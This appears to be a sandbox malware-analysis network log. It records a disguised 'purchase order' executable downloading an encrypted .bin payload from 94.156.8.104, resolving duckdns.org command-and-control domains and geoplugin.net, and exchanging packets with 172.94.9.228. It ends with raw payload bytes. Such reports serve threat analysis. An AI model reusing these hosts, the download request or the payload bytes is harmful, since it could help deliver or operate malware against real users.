                                                                                                                                                              Apr 26, 2024 09:46:55.637850046 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.638010979 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.638056040 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.638237953 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.638410091 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.638572931 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.955991030 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085800886 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085812092 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085819960 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085850000 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085859060 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085867882 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085875988 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085884094 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085891008 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085899115 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.085906982 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086035013 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086060047 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086087942 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086111069 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086118937 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086267948 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086374044 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086385012 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086406946 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086519003 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086656094 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086668968 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086677074 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086705923 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086728096 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086750031 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086757898 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086839914 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.086960077 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.138844967 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:56.232563972 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:56.232744932 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:56.232769966 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:56.232942104 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:56.233136892 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:56.233278036 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:56.555721045 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.564887047 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.564898014 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565186977 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565211058 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565232992 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565241098 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565248966 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565257072 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565278053 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565458059 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565469027 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565490007 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565511942 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565535069 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565754890 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565767050 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565774918 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565782070 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565789938 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565797091 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565804958 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565812111 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.565819979 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566039085 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566051006 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566059113 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566066027 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566073895 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566081047 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566088915 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566097021 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566324949 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566337109 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566344976 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566353083 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566359997 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566368103 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566601038 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566626072 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566647053 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566654921 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566663027 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566670895 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566679001 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566687107 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566694975 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566703081 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566724062 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566731930 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566838026 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.566847086 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567117929 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567126989 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567379951 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567388058 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567395926 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567641973 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567650080 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567657948 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:56.567667007 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:47:04.664876938 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:47:04.715109110 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:47:04.817266941 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Apr 26, 2024 09:41:55.480453968 CEST5924653192.168.11.201.1.1.1
                                                                                                                                                              Apr 26, 2024 09:41:56.487248898 CEST5924653192.168.11.209.9.9.9
                                                                                                                                                              Apr 26, 2024 09:41:57.502847910 CEST5924653192.168.11.201.1.1.1
                                                                                                                                                              Apr 26, 2024 09:41:59.517322063 CEST5924653192.168.11.201.1.1.1
                                                                                                                                                              Apr 26, 2024 09:41:59.517322063 CEST5924653192.168.11.209.9.9.9
                                                                                                                                                              Apr 26, 2024 09:41:59.582565069 CEST53592461.1.1.1192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:59.582632065 CEST53592461.1.1.1192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:59.582951069 CEST5924653192.168.11.209.9.9.9
                                                                                                                                                              Apr 26, 2024 09:41:59.616961956 CEST53592461.1.1.1192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:59.618927956 CEST5673353192.168.11.201.1.1.1
                                                                                                                                                              Apr 26, 2024 09:42:00.626382113 CEST5673353192.168.11.209.9.9.9
                                                                                                                                                              Apr 26, 2024 09:42:01.404171944 CEST53592469.9.9.9192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:01.543720007 CEST53567339.9.9.9192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:02.548661947 CEST5454453192.168.11.209.9.9.9
                                                                                                                                                              Apr 26, 2024 09:42:02.648195028 CEST53545449.9.9.9192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:03.499294996 CEST5110653192.168.11.209.9.9.9
                                                                                                                                                              Apr 26, 2024 09:42:03.601773977 CEST53511069.9.9.9192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:03.721551895 CEST53567331.1.1.1192.168.11.20
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Apr 26, 2024 09:41:55.480453968 CEST192.168.11.201.1.1.10x441eStandard query (0)janbours92harbu01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:56.487248898 CEST192.168.11.209.9.9.90x441eStandard query (0)janbours92harbu01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:57.502847910 CEST192.168.11.201.1.1.10x441eStandard query (0)janbours92harbu01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:59.517322063 CEST192.168.11.201.1.1.10x441eStandard query (0)janbours92harbu01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:59.517322063 CEST192.168.11.209.9.9.90x441eStandard query (0)janbours92harbu01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:59.582951069 CEST192.168.11.209.9.9.90x441eStandard query (0)janbours92harbu01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:59.618927956 CEST192.168.11.201.1.1.10xc589Standard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:00.626382113 CEST192.168.11.209.9.9.90xc589Standard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:02.548661947 CEST192.168.11.209.9.9.90x11dfStandard query (0)janbours92harbu01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:03.499294996 CEST192.168.11.209.9.9.90x46c4Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Apr 26, 2024 09:41:59.582565069 CEST1.1.1.1192.168.11.200x441eServer failure (2)janbours92harbu01.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:59.582632065 CEST1.1.1.1192.168.11.200x441eServer failure (2)janbours92harbu01.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:41:59.616961956 CEST1.1.1.1192.168.11.200x441eServer failure (2)janbours92harbu01.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:01.404171944 CEST9.9.9.9192.168.11.200x441eNo error (0)janbours92harbu01.duckdns.org172.94.9.228A (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:01.543720007 CEST9.9.9.9192.168.11.200xc589Name error (3)janbours92harbu02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:02.648195028 CEST9.9.9.9192.168.11.200x11dfNo error (0)janbours92harbu01.duckdns.org172.94.9.228A (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:03.601773977 CEST9.9.9.9192.168.11.200x46c4No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                              Apr 26, 2024 09:42:03.721551895 CEST1.1.1.1192.168.11.200xc589Server failure (2)janbours92harbu02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              • 94.156.8.104
                                                                                                                                                              • geoplugin.net
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.11.205030094.156.8.104807048C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Apr 26, 2024 09:41:53.963989019 CEST185OUTGET /yhHZZNqAePDSUakAFmHWn151.bin HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                              Host: 94.156.8.104
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Apr 26, 2024 09:41:54.173407078 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                              Date: Fri, 26 Apr 2024 07:41:54 GMT
                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                              Last-Modified: Thu, 25 Apr 2024 21:14:50 GMT
                                                                                                                                                              ETag: "78c40-616f2470a0680"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 494656
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Data Raw: 25 cd 5d 6f 90 0c 14 c3 a9 6f a7 05 a0 19 c6 5d 5a d9 5b cb 50 18 57 be a5 8e 7d 20 da 96 b6 0a 33 c2 3b 36 19 4c e5 44 b4 e2 64 87 43 73 bb f9 d8 a8 8d f6 04 cf 11 65 f7 b3 6b 1f df bb d1 f1 29 e1 dd 4e da 0a 4b b5 fd 3a e8 3a 57 d5 74 f9 75 29 9b 71 2f 41 22 5f 7b 2c 85 5e 18 53 6e 68 e8 48 84 a0 7d e0 52 cc 41 ac e7 6f a6 b9 2c e9 d6 ca 3f 04 31 15 72 b5 90 aa 00 a8 c4 f2 6f b5 55 16 4d 7c d1 67 28 62 f4 99 9d 37 5c 4d af db a6 44 d2 a6 4d fe 5c f3 c5 c2 92 be c5 1e 8c 7a 8c 3b b8 0b 03 a3 d0 10 ac 32 b7 6f 4a 9d 2c 5e 94 84 ec 61 28 4d 1d 23 da 49 f8 09 3b f0 d8 db f4 31 5a e2 8d 89 ea f6 bd 62 7b 8c d3 ce ba fe a2 24 ba 87 15 41 0d be 94 47 e9 7c 03 3f c9 62 2e d4 4c 0a 51 ae 9d 07 15 2c 48 46 c5 a1 10 50 f1 58 59 e3 d9 b4 23 92 9b 46 fc 05 f2 29 28 fe 49 70 c1 d2 16 a8 bd 46 1c 7a b6 dd e7 be 83 c7 e5 bb 66 ce 71 76 6c 5f 95 a6 70 00 73 97 a6 96 9a 8f 3b 3d 8d 33 c4 bf 03 8a 46 01 40 a6 33 fe 57 be 1c 18 ea 6b 64 40 e1 40 9c 99 9f 38 a2 b5 91 03 80 e5 57 8c b7 b1 a1 25 b8 61 aa b8 a6 87 a2 d9 99 06 46 f0 ac a5 2b 31 00 7b 49 80 4a e6 01 28 6d 41 37 74 73 f6 9a 24 b8 de c2 f9 45 71 9b ae 1b 55 28 7d cc f9 6e 39 a0 3a 44 b3 84 6c 2f d7 5c da 01 ed 54 19 8c b3 c6 45 61 56 94 de 65 a9 69 69 64 08 69 43 92 f3 a0 8d a2 d1 8b d2 e7 b8 58 a9 8e 1c ed 0f 41 2a 54 18 6c eb ba 40 22 44 3b 00 1c a5 ab 18 6b 02 3f 9f 9d 74 39 81 81 a6 23 b2 59 d1 e0 d1 71 de c7 c7 51 65 fa f5 36 ab 3b 93 97 8a 65 10 50 9f 89 d2 05 dd 69 7e 85 cc 89 a1 9a df be 40 09 2c 56 33 4d 35 11 a5 df 37 00 9b 19 2b 58 f2 e2 35 6d ad 69 7f 33 f8 1c f5 45 0c 0c 60 ab 40 9d d9 4a bb 6a 6c 9e 67 61 32 fc 9f af f6 82 37 3f 35 45 e8 64 e0 03 6b 4e 0b 77 a6 1b 89 b8 1e 6d cf f5 c5 ab d4 22 a2 a2 b2 d7 58 f5 dc ba 38 8e b4 76 51 e6 2b 92 58 f6 21 e0 b5 9e 8b 11 7e 0c 45 8c 30 f2 94 bd 4f b5 ef ea 61 2e 42 2d 24 6d 4b f8 89 3c eb 7a ad 86 70 86 8d e0 1e b1 bd 9e 5b 6f 77 5a 62 d8 cf fa fc 93 d4 b5 51 91 41 7a 68 cc 7b 89 e8 e5 ed 2c 23 eb 4c 96 12 dc ee 52 5b 94 d7 03 ee 0c dc 12 8f 4a aa ad bd 23 67 0e c4 74 38 42 d0 61 ca 08 85 f2 6c 0f e6 38 d0 f7 6b 48 7e 49 93 1c a6 bc 86 41 98 a6 f6 36 b1 77 76 14 7d a4 d3 15 6f 44 e9 27 61 ae 3a 3c 65 44 ad 8d d5 1e 83 75 ad 1f af 6e 71 da 4f bb 92 a3 da f1 4d dc 83 ef 06 aa be 72 8d 78 81 f2 6c d6 6b 6d 49 08 f9 b1 f1 36 e8 ae 22 5e 52 45 d9 28 55 2c d8 8a e4 0b 62 cd 34 e6 14 f3 02 c9 0a a1 e2 d5 c1 60 24 df 5b 13 62 23 1a 5a d1 53 90 78 7d df 83 5e e8 de 61 3f a2 e9 f9 a3 82 9b 1c 60 c5 ac 24 d2 73 0f 1c d5 fc 70 30 76 01 0f 6b 17 27 1c d9 8f 48 3e d3 16 94 5f be 89 76 93 9f ed 06 5a f4 e6 c8 21 3f dc c3 86 52 13 54 f8 22 6b e4 37 d8 8d 5c 08 de 91 f1 3c 19 40 e9 5c 65 ce 7b e1 4e 69 00 ac 49 8a 2a ab 41 11 9c 42 0c 30 a5 68 52 d1 08 f3 5f 98 17 0d fa be 6b 42 35 76 53 f7 18 0c 78 34 e2 c4 f1 a7 47 25 ab 6f e6 d6 03 95 73 01 48 41 65 35 43 c3 e4 9e 02 f6 dc 7d 16 9e 72 3d f5 d3 16 61 39 73 1e 91 05 8e a7 82 74 5f f8 dd da 49 cc 03 52 87 71 67 d2 19 56 69 af e4 f1 58 e6 b2 a0 e1 e1 87 cf dc 65 bc 97 4d 3b d1 a5 dd fb 49 c4 28 35 c3 46 0a d7 ac 7c 63 b2 8c 8d 3d 95 63 50 63 94 a4 51 da 21 24 40 0a 71 59 da 59 ba 5c 3a 23 e0 21 01 47 14 45 f2 f4 66 77 64 86 88 bf 23
                                                                                                                                                              Data Ascii: %]oo]Z[PW} 3;6LDdCsek)NK::Wtu)q/A"_{,^SnhH}RAo,?1roUM|g(b7\MDM\z;2oJ,^a(M#I;1Zb{$AG|?b.LQ,HFPXY#F)(IpFzfqvl_ps;=3F@3Wkd@@8W%aF+1{IJ(mA7ts$EqU(}n9:Dl/\TEaVeiidiCXA*Tl@"D;k?t9#YqQe6;ePi~@,V3M57+X5mi3E`@Jjlga27?5EdkNwm"X8vQ+X!~E0Oa.B-$mK<zp[owZbQAzh{,#LR[J#gt8Bal8kH~IA6wv}oD'a:<eDunqOMrxlkmI6"^RE(U,b4`$[b#ZSx}^a?`$sp0vk'H>_vZ!?RT"k7\<@\e{NiI*AB0hR_kB5vSx4G%osHAe5C}r=a9st_IRqgViXeM;I(5F|c=cPcQ!$@qYY\:#!GEfwd#
                                                                                                                                                              Apr 26, 2024 09:41:54.173486948 CEST1289INData Raw: 3c a4 4e 1a 18 fc 13 fa a7 3a 60 40 c0 e7 6c 10 e4 69 7f df 8c 35 fe c2 e0 06 f6 22 6c 93 25 54 75 2a c4 c4 29 39 4b d7 78 24 83 ea 61 3c 0e 2b c1 ee ad a0 17 5b 81 69 9b c9 93 0f 6d 1c c5 ad 2a d7 83 79 77 7c be cb d2 c1 ac 05 62 95 3a 8d 3a 4f
                                                                                                                                                              Data Ascii: <N:`@li5"l%Tu*)9Kx$a<+[im*yw|b::OTJa74sY3tCh=coKEhvaf4^_K-8,3wrh@*}-J/AdDa:B3)sB"_S-H,`ls_Jv*q5o{
                                                                                                                                                              Apr 26, 2024 09:41:54.173544884 CEST1289INData Raw: 84 68 11 0a ba 49 f1 cc 96 a2 e8 28 ff ab dd 5e 12 7b b9 cb 87 e5 fe 4d a6 a3 38 48 b5 a0 f9 80 77 29 6f 74 11 a3 1b 98 71 76 82 4a 08 ba 69 85 b6 7a 61 6d 68 b1 8b ec c1 fc a5 52 24 17 9e e4 6f ff 7a 95 39 f7 8d 3f ec 94 28 71 b5 f8 c1 81 ed d4
                                                                                                                                                              Data Ascii: hI(^{M8Hw)otqvJizamhR$oz9?(q/XcP]7y8AP1f= &R*| dG8[ijA%<`7\8K.y&}6G^};%Hn1g}YZsFH{|
                                                                                                                                                              Apr 26, 2024 09:41:54.173599958 CEST1289INData Raw: 7c fc 0b f8 aa e1 27 2e 76 3f 88 54 4c c5 b5 9b f5 8f 85 5d 47 0a b4 09 bb b2 e0 38 de fa ca c6 82 1c e3 c7 f6 ff 31 07 df 45 ad 3f e9 19 d0 5b a6 3a d1 a4 3f 1f f6 d4 4e 09 99 71 69 e5 92 a8 fd fd 80 fd 5f de 45 ff 7c 68 38 7a 32 7f 2f c9 60 7e
                                                                                                                                                              Data Ascii: |'.v?TL]G81E?[:?Nqi_E|h8z2/`~2hi&KkZ\sil^!<r9wXN"20*AzqcJ'%5T(}.u/GYP*P=Ea|LUuOc)["<*hz
                                                                                                                                                              Apr 26, 2024 09:41:54.173655033 CEST1289INData Raw: 62 af 5e 9d 06 b3 a9 e6 e2 70 e8 85 1c 49 80 20 e6 6b 28 85 62 a5 77 71 3b 78 04 b5 de c2 e1 40 1b 9a 50 59 56 28 7d 0f ac 0a 9c f2 69 cf fe 8c 3b a4 be 62 21 75 b7 7e 19 e6 a2 2e 62 62 54 94 55 ab 41 89 6b 64 08 39 c8 58 1b 78 8f a2 d1 db 3a e4
                                                                                                                                                              Data Ascii: b^pI k(bwq;x@PYV(}i;b!u~.bbTUAkd9Xx:PAi5+1rS a4'#MZ/.A65QeeIA:i~:,m<J_iQExD;Jh#7gkNsMI%{^/VZ^1vrQ+Y
                                                                                                                                                              Apr 26, 2024 09:41:54.173715115 CEST1289INData Raw: 47 cc a1 13 9b 9a 50 7f 39 a9 47 69 21 41 4d 53 db 07 9b 8c 40 0d 1a a1 14 94 52 d2 bb 3f 73 1f 7e 8b 4c 5c 9f df 64 89 31 b8 46 95 93 15 af 5d 9e f9 9f b7 ab d9 bc 89 0e 19 eb 24 e0 fc 1f 6a 07 fc 68 dc 89 b7 1e 6d 5f 18 d2 52 d0 22 fc 60 ba d7
                                                                                                                                                              Data Ascii: GP9Gi!AMS@R?s~L\d1F]$jhm_R"`8mz>UZ*(?6(oa.#dn@sS>03F/[L&k(&JkEa`P3,YCPN>4w&P8<eN5
                                                                                                                                                              Apr 26, 2024 09:41:54.173773050 CEST1289INData Raw: 4b 3e cf a8 71 bf 02 46 b4 61 4a 19 12 d3 d2 25 b3 a6 32 31 77 51 5b 94 3c 31 6e 70 f8 02 8f 3e b5 6e 43 33 54 3a 2b da a4 30 29 9e 35 c7 17 79 6c 34 06 30 92 31 35 22 7f a1 f0 e0 59 43 6d 4d 1d 50 83 3c e7 fc b9 fc 6d e4 d3 15 2a 9c c2 44 87 6e
                                                                                                                                                              Data Ascii: K>qFaJ%21wQ[<1np>nC3T:+0)5yl4015"YCmMP<m*DndmME*A?'2Em\QEQW!v{u7V-vH7Fei,'`i9|o&/Kd,q*:\'9M{|Z.?(6`0Sc?U
                                                                                                                                                              Apr 26, 2024 09:41:54.173831940 CEST1289INData Raw: 44 03 81 60 bb 16 ab 22 db ab 3f 31 ef 24 4c 35 39 ca 78 b3 c9 5c 47 52 ba d1 61 55 ef 16 8d 87 8a 63 68 44 c9 44 a0 3a 8c f0 9f 11 f0 b2 38 36 e8 11 2b 39 55 28 5d fe 2b 3e d3 83 6d 5b be 60 b1 94 9f ed 6b b2 ec e6 98 26 66 1e c7 86 bb 38 54 f8
                                                                                                                                                              Data Ascii: D`"?1$L59x\GRaUchDD:86+9U(]+>m[`k&f8T"Nr6@\_EI+CfE.7SZCwG5!)foDv,RqX{*r A$+-M_j.?4Ih-1x-}d9ck/2
                                                                                                                                                              Apr 26, 2024 09:41:54.173886061 CEST1289INData Raw: 6b d6 03 95 23 8a 86 a9 da c3 bc 3c 0f a1 8f b3 cc 2d 9b d3 66 d5 77 d3 16 61 69 fe 53 81 ed e7 a7 82 74 0f 75 98 d2 19 41 4e 5e 6f 10 67 d2 19 06 e4 ea 18 7a 96 b6 5a d1 10 1e 78 9f 51 28 b4 7f 01 3b d1 a5 8d 70 87 2c f0 36 c3 46 81 11 f2 f7 86
                                                                                                                                                              Data Ascii: k#<-fwaiStuAN^ogzZxQ(;p,6FN=:ckupqYQ0Ay]kH}'</OT60k}nHU.-(.sE(/bLv$-]n<QWSzNN5J4a~8m$t+^x"
                                                                                                                                                              Apr 26, 2024 09:41:54.174098015 CEST1289INData Raw: d8 09 dd ef 57 29 07 8a 5e e0 e4 a2 f7 a3 cb 92 db 7c e9 25 18 12 7b 90 54 3d 18 e8 30 39 6a 10 07 ae ef 08 a8 3a ba 29 6b 46 24 70 e4 c5 a7 9f 0d 62 05 88 75 c5 72 9e 0e d8 46 b2 a2 38 47 27 4d 9e 08 35 4a 22 c7 8c ef 91 c2 57 d3 e8 e6 0c 24 c2
                                                                                                                                                              Data Ascii: W)^|%{T=09j:)kF$pburF8G'M5J"W$t+^dA~Rtg)8^hptj!a ilF\@!.W>78U8xkFv4lN)G3?}I!"9P*H[)<ROG4[%
